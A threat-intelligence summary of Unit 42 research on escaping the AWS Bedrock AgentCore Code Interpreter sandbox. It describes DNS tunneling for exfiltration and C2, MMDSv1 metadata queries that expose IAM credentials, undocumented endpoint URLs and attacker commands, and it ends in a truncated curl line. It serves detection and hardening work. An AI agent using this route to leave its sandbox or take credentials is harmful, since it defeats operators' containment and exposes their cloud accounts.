Cracks in the Bedrock: Escaping the AWS AgentCore Sandbox
Unit 42 researchers discovered a method to bypass the network isolation of Amazon Bedrock AgentCore's Code Interpreter sandbox using DNS tunneling. Combined with a legacy MMDSv1 configuration that lacked session token enforcement, attackers could potentially exploit SSRF to extract highly privileged IAM credentials and exfiltrate them via the DNS covert channel.
Authors: Unit 42
Source:
Palo Alto Networks
- domaindnshook[.]siteAttacker-controlled domain used in the PoC for DNS tunneling exfiltration and C2.
- domainkepler-ola-us-east-1-prod-logs-bucket[.]s3[.]us-east-1[.]amazonaws[.]comInternal AWS S3 bucket exposed via pre-signed URLs in the metadata service.
Key Takeaways
- AWS Bedrock AgentCore's Code Interpreter sandbox mode allowed external data exfiltration and C2 via DNS tunneling, despite being documented as having no external network access.
- The microVM Metadata Service (MMDS) defaulted to v1, lacking session token enforcement and allowing SSRF vulnerabilities to extract highly privileged IAM credentials.
- Undocumented MMDS endpoints leaked internal AWS S3 pre-signed URLs and KMS keys used for backend logging.
- AWS has updated documentation to reflect limited network access and enforced MMDSv2 for new agents to mitigate the metadata exposure.
Affected Systems
- Amazon Bedrock AgentCore
- AgentCore Code Interpreter
- AgentCore Runtime
Attack Chain
The attacker first exploits a vulnerability (like SSRF) or uses intended code execution within the AgentCore Code Interpreter to query the local MMDS endpoint (169.254.169.254) without needing a session token. This allows the extraction of sensitive IAM credentials attached to the AI agent. To exfiltrate these credentials from the isolated sandbox, the attacker encodes the data as subdomains and performs recursive DNS lookups to an attacker-controlled authoritative nameserver. This establishes a bidirectional DNS tunneling channel for both data exfiltration and command-and-control (C2).
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide specific detection rules, but outlines the behavioral mechanisms of the attack for conceptual detection engineering.
Detection Engineering Assessment
EDR Visibility: None — This is a managed AWS microVM environment; customers cannot install EDR agents on AgentCore runtimes. Network Visibility: Medium — Customers can monitor DNS logs if using VPC mode with Route 53 Resolver DNS Firewall, but visibility in the default Sandbox mode is limited to the AWS backend. Detection Difficulty: Hard — Requires analyzing DNS query patterns for tunneling and monitoring CloudTrail for anomalous IAM credential usage originating from unexpected IPs.
Required Log Sources
- AWS CloudTrail
- Route 53 DNS Query Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for unusually long or high-entropy subdomains in DNS queries originating from AWS environments, indicating potential DNS tunneling. | DNS Query Logs | Exfiltration | Medium |
| Monitor for AWS API calls using IAM roles assigned to Bedrock AgentCore originating from IP addresses outside the expected AWS service ranges. | AWS CloudTrail | Credential Access | Low |
Control Gaps
- Lack of outbound network filtering for DNS in Sandbox mode
- Default MMDSv1 allowing unauthenticated local metadata access
Key Behavioral Indicators
- High volume of DNS TXT or A record queries to a single external domain from an AI agent environment
- HTTP GET requests to 169.254.169.254 without IMDSv2 token headers in agent code
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Ensure all new AgentCore agents are deployed using MMDSv2.
- Use the AWS API to disable MMDSv1 on older agents.
Infrastructure Hardening
- Use VPC Mode instead of Sandbox mode for complete network isolation.
- Implement Amazon Route 53 Resolver DNS Firewall when using VPC Mode to block unauthorized DNS egress.
User Protection
- Apply the principle of least privilege to IAM roles attached to AI agents.
Security Awareness
- Educate developers that 'sandbox' environments may still have permeable boundaries like DNS.
- Treat AI agent environments as potential SSRF vectors.
MITRE ATT&CK Mapping
- T1552.005 - Unsecured Credentials: Cloud Instance Metadata API
- T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
- T1071.004 - Application Layer Protocol: DNS
- T1528 - Steal Application Access Token
Additional IOCs
- Domains:
my-secret[.]0f812bbe-f15e-41fe-acfa-4308b271fa0a[.]dnshook[.]site- Specific subdomain used in the PoC to exfiltrate the string 'my-secret'.
- Urls:
hxxp://169[.]254[.]169[.]254/latest/meta-data/tags/instance/aws_presigned-log-url- Undocumented MMDS endpoint leaking an internal S3 pre-signed URL.hxxp://169[.]254[.]169[.]254/latest/meta-data/tags/instance/aws_presigned-log-kms-key- Undocumented MMDS endpoint leaking an internal KMS key.hxxp://169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/- MMDS endpoint used to query attached IAM role credentials.
- Command Lines:
- Purpose: Identify the AWS account associated with the leaked Access Key ID. | Tools:
aws-cli| Stage: Discovery |aws sts get-access-key-info --access-key-id - Purpose: Attempt to write to the internal S3 bucket using the pre-signed URL. | Tools:
curl| Stage: Exfiltration |curl -X PUT "https://
- Purpose: Identify the AWS account associated with the leaked Access Key ID. | Tools: